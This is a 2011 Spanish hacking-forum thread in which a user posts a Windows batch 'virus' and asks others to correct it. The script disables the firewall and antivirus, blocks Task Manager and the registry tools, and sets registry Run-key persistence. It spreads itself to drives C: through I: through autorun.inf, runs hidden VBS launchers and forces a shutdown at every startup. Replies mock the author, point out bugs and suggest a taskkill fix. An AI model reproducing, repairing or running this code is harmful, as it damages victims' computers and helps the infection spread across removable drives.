Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: W4rR3d en 17 Marzo 2011, 05:09 am


Título: virus informatico taskmgr.bat
Publicado por: W4rR3d en 17 Marzo 2011, 05:09 am
 
grupo black Eye Security Team   su amigo W4rR3d

espero que lo corrigan este virus informatico

Código
  1.  @echo off
  2. msg * hacked by -={W4rR3d}=-
  3. net stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  4. net stop "Actualizaciones automáticas"
  5. net stop "Centro de seguridad"
  6. net stop "nod32krn"
  7. net stop "nod32kui"
  8. net stop "nod32"
  9. net stop "TeaTimer"
  10. taskkill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe
  11. Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
  12. start /MAX %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
  13. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TASKMGR /t REG_SZ /d "C:\taskmgr.bat" /f
  14. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SHUTDOWN /t REG_SZ /d "C:\apagar.vbs" /f
  15. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  16. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f
  18. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  19. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
  20. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  21. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  22. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.imagehousing.com/image/671793"
  23. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  24. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  25. Set task=echo
  26. copy /Y "%0" "C:\taskmgr.bat"
  27. if exist C:\autorun.inf goto D
  28. %task%.[Autorun] >> C:\Autorun.inf
  29. %task%.label=Pendrive >> C:\Autorun.inf
  30. %task%.action=Abrir Pendrive >> C:\Autorun.inf
  31. %task%.shellexecute="/taskmgr.bat" >> C:\Autorun.inf
  32. echo On Error Resume Next >> C:\taskmgr.vbs
  33. echo set shell = CreateObject("WScript.Shell") >> C:\taskmgr.vbs
  34. echo shell.run "C:\taskmgr.bat",0 >> C:\taskmgr.vbs
  35. start  C:\taskmgr.vbs
  36. attrib +s +h +r C:\taskmgr.bat
  37. attrib +s +h +r C:\autorun.inf
  38. :D
  39. copy /Y "%0" "D:\taskmgr.bat"
  40. if exist D:\autorun.inf goto E
  41. %task%.[Autorun] >> D:\Autorun.inf
  42. %task%.label=Pendrive >> D:\Autorun.inf
  43. %task%.action=Abrir Pendrive >> D:\Autorun.inf
  44. %task%.shellexecute="/taskmgr.bat" >> D:\Autorun.inf
  45. echo On Error Resume Next >> D:\taskmgr.vbs
  46. echo set shell = CreateObject("WScript.Shell") >> D:\taskmgr.vbs
  47. echo shell.run "D:\taskmgr.bat",0 >> D:\taskmgr.vbs
  48. start  D:\taskmgr.vbs
  49. attrib +s +h +r D:\taskmgr.bat
  50. attrib +s +h +r D:\autorun.inf
  51. :E
  52. copy /Y "%0" "E:\taskmgr.bat"
  53. if exist E:\autorun.inf goto F
  54. %task%.[Autorun] >> E:\Autorun.inf
  55. %task%.label=Pendrive >> E:\Autorun.inf
  56. %task%.action=Abrir Pendrive >> E:\Autorun.inf
  57. %task%.shellexecute="/taskmgr.bat" >> E:\Autorun.inf
  58. echo On Error Resume Next >> E:\taskmgr.vbs
  59. echo set shell = CreateObject("WScript.Shell") >> E:\taskmgr.vbs
  60. echo shell.run "E:\taskmgr.bat",0 >> E:\taskmgr.vbs
  61. start  E:\taskmgr.vbs
  62. attrib +s +h +r E:\taskmgr.bat
  63. attrib +s +h +r E:\autorun.inf
  64. :F
  65. copy /Y "%0" "F:\taskmgr.bat"
  66. if exist F:\autorun.inf goto G
  67. %task%.[Autorun] >> F:\Autorun.inf
  68. %task%.label=Pendrive >> F:\Autorun.inf
  69. %task%.action=Abrir Pendrive >> F:\Autorun.inf
  70. %task%.shellexecute="/taskmgr.bat" >> F:\Autorun.inf
  71. echo On Error Resume Next >> F:\taskmgr.vbs
  72. echo set shell = CreateObject("WScript.Shell") >> F:\taskmgr.vbs
  73. echo shell.run "F:\taskmgr.bat",0 >> F:\taskmgr.vbs
  74. start  F:\taskmgr.vbs
  75. attrib +s +h +r F:\taskmgr.bat
  76. attrib +s +h +r F:\autorun.inf
  77. :G
  78. copy /Y "%0" "G:\taskmgr.bat"
  79. if exist G:\autorun.inf goto H
  80. %task%.[Autorun] >> G:\Autorun.inf
  81. %task%.label=Pendrive >> G:\Autorun.inf
  82. %task%.action=Abrir Pendrive >> G:\Autorun.inf
  83. %task%.shellexecute="/taskmgr.bat" >> G:\Autorun.inf
  84. echo On Error Resume Next >> G:\taskmgr.vbs
  85. echo set shell = CreateObject("WScript.Shell") >> G:\taskmgr.vbs
  86. echo shell.run "G:\taskmgr.bat",0 >> G:\taskmgr.vbs
  87. start  G:\taskmgr.vbs
  88. attrib +s +h +r G:\taskmgr.bat
  89. attrib +s +h +r G:\autorun.inf
  90. :H
  91. copy /Y "%0" "H:\taskmgr.bat"
  92. if exist H:\autorun.inf goto I
  93. %task%.[Autorun] >> H:\Autorun.inf
  94. %task%.label=Pendrive >> H:\Autorun.inf
  95. %task%.action=Abrir Pendrive >> H:\Autorun.inf
  96. %task%.shellexecute="/taskmgr.bat" >> H:\Autorun.inf
  97. echo On Error Resume Next >> H:\taskmgr.vbs
  98. echo set shell = CreateObject("WScript.Shell") >> H:\taskmgr.vbs
  99. echo shell.run "H:\taskmgr.bat",0 >> H:\taskmgr.vbs
  100. start  H:\taskmgr.vbs
  101. attrib +s +h +r H:\taskmgr.bat
  102. attrib +s +h +r H:\autorun.inf
  103. :I
  104. copy /Y "%0" "I:\taskmgr.bat"
  105. if exist I:\autorun.inf goto REINI
  106. %task%.[Autorun] >> I:\Autorun.inf
  107. %task%.label=Pendrive >> I:\Autorun.inf
  108. %task%.action=Abrir Pendrive >> I:\Autorun.inf
  109. %task%.shellexecute="/taskmgr.bat" >> I:\Autorun.inf
  110. echo On Error Resume Next >> I:\taskmgr.vbs
  111. echo set shell = CreateObject("WScript.Shell") >> I:\taskmgr.vbs
  112. echo shell.run "C:\taskmgr.bat",0 >> I:\taskmgr.vbs
  113. start  I:\taskmgr.vbs
  114. attrib +s +h +r I:\taskmgr.bat
  115. attrib +s +h +r I:\autorun.inf
  116. :REINI
  117. echo On Error Resume Next >> C:\apagar.vbs
  118. echo set shell = CreateObject("WScript.Shell") >> C:\apagar.vbs
  119. echo shell.run "shutdown.exe -s  -t 11" >> C:\apagar.vbs
  120. start  C:\apagar.vbs
  121. start /MIN %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton

Título: Re: virus informatico taskmgr.bat
Publicado por: Shell Root en 17 Marzo 2011, 05:20 am
Y sigues con lo mismo hahaahhah

Cita de: W4rR3d en 17 Marzo 2011, 05:09 am
espero que lo corrigan este virus informatico
Y ni estáis seguro de lo que hacéis :D

Título: Re: virus informatico taskmgr.bat
Publicado por: SuperDraco en 17 Marzo 2011, 06:51 am
Con lo fácil que es que pruebes tu mismo por ejemplo esta parte del código que se ve a simple vista que no va a ir, antes de preguntar...

net stop "Actualizaciones automáticas"

Has probado alguno de los comandos por ti mismo?? '¬¬ siempre son iguales xDDD

Y debes poner:
taskkill /f /T /im para el nod

Ya no me he mirado más...

saludos.

Título: Re: virus informatico taskmgr.bat
Publicado por: Edu en 17 Marzo 2011, 14:22 pm
Buena presentacion.. xD
Empieza a dividirlo y probarlo con vs mismo en alguna maquina virtual si quieres para ver q partes funcionan ya q algunas creo q ni funcionaran

Título: Re: virus informatico taskmgr.bat
Publicado por: FranciskoAsdf en 26 Marzo 2011, 13:13 pm
Para que corregir algo que solo "hace daño"?, mejor gastar el tiempo ayudando a gente que hace utitlidades :)


Saludos


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines